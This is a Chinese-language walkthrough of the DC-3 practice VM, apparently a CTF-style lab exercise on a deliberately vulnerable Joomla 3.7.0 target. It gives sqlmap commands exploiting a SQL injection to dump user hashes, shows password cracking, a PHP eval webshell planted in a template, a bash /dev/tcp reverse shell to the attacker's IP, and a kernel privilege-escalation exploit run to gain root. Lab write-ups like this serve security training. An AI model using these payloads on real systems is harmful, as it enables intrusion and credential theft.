靶机DC-3

壮心未与年俱老,死去犹能作鬼雄。这篇文章主要讲述靶机DC-3相关的知识,希望能为你提供帮助。
DC3靶机地址:http://www.five86.com
探测出靶机ip后扫描靶机的信息

靶机DC-3

文章图片

访问80端口,这次只有一个flag
靶机DC-3

文章图片

使用kali自带的joomscan扫描下
好吧不是自带的,https://github.com/OWASP/joomscan
下载zip文件
unzip joomscan-master.zip cd joomscan-master perl joomscan.pl perl joomscan.pl -u 192.168.32.131

查了下joomlascan3.7版本有sql注入的漏洞
靶机DC-3

文章图片

搜索下这个joomla这个版本的漏洞
searchsploit joomla | grep 3.7.0

靶机DC-3

文章图片

然后去访问php/webapps/42033.txt文件
文件里给我们提供了sqlmap的参数,肥肠好用,默默关掉了msf...
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

靶机DC-3

文章图片

使用sqlmap跑下,跑出来几个数据库名
sqlmap -u "http://192.168.32.131/index.php?option=com_fields& view=fields& layout=modal& list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

靶机DC-3

文章图片

跑下表名,还挺多的,可以重点关注下mysql跟joomladb的表
sqlmap -u "http://192.168.32.131/index.php?option=com_fields& view=fields& layout=modal& list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables--tables 列出数据库中的表

靶机DC-3

文章图片

试了会儿发现mysql表没啥东西,直接干joomladb就可以了
发现有username和password
sqlmap -u "http://192.168.32.131/index.php?option=com_fields& view=fields& layout=modal& list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --columns-D "joomladb" -T "#__users"--columns 列出字段 -D 指定数据库名 -T 指定表名

靶机DC-3

文章图片

看下字段里的内容
sqlmap -u "http://192.168.32.131/index.php?option=com_fields& view=fields& layout=modal& list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --dump -D "joomladb" -T "#__users" -C "username,password"

靶机DC-3

文章图片

hashid识别下加密类型,为bcrypt
靶机DC-3

文章图片

使用hashcat解密
先hashcat --help看下加密类型的编号
grep再筛选下,为3200
靶机DC-3

文章图片

靶机DC-3

文章图片

知道加密类型的编码后开始破解
输入下列指令后发生报错,查了下需要写到文件里,且不能有空格
https://stackoverflow.com/questions/50198565/hashcat-bcrypt-2-blowfish-unix-line-length-exception/50200893
hashcat -m 3200$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

靶机DC-3

文章图片

发现跑不出来密码,查了下要加字典的
靶机DC-3

文章图片

算了,用john破解吧,很快嗷,加密类型跟解密结果都出来了
靶机DC-3

文章图片

登陆admin/snoopy
不要登陆首页的那个嗷,登陆joomscan扫出来的管理界面 xxx/administrator
靶机DC-3

文章图片

靶机DC-3

文章图片

然后到模板,写入一句话
靶机DC-3

文章图片

靶机DC-3

文章图片

然后使用webshell工具进行连接
http://192.168.32.131/templates/protostar/html/test.php
但是发现没什么权限,但是有修改文件的权限,可以把我们的一句话改下弹到kali上
< ?php@eval($_POST[cmd]); system("bash -c \'bash -i > & /dev/tcp/192.168.32.128/6666 0> & 1\'"); ?>

靶机DC-3

文章图片

靶机DC-3

文章图片

开启监听后浏览器访问test.php后连接成功,查看下系统版本
靶机DC-3

文章图片

搜索相关漏洞
Linux Kernel 4.4.x (Ubuntu 16.04) - \'double-fdput()\' bpf(BPF_PROG_LOAD) Privilege Escalation
提权参考:https://blog.csdn.net/nzjdsds/article/details/115519245
靶机DC-3

文章图片

查看该漏洞的文档,下载exp
靶机DC-3

文章图片

下载好后通过蚁剑上传到靶机,注意上传的路径
靶机DC-3

文章图片

然后在上传位置解压后
tar -xvf exploit.tar cd ebpf_mapfd_doubleput_exploit ./compile.sh ./doubleput ... we have root privs now... #可以开始输入指令了

靶机DC-3

文章图片

【靶机DC-3】在root目录下找到flag
靶机DC-3

文章图片


    推荐阅读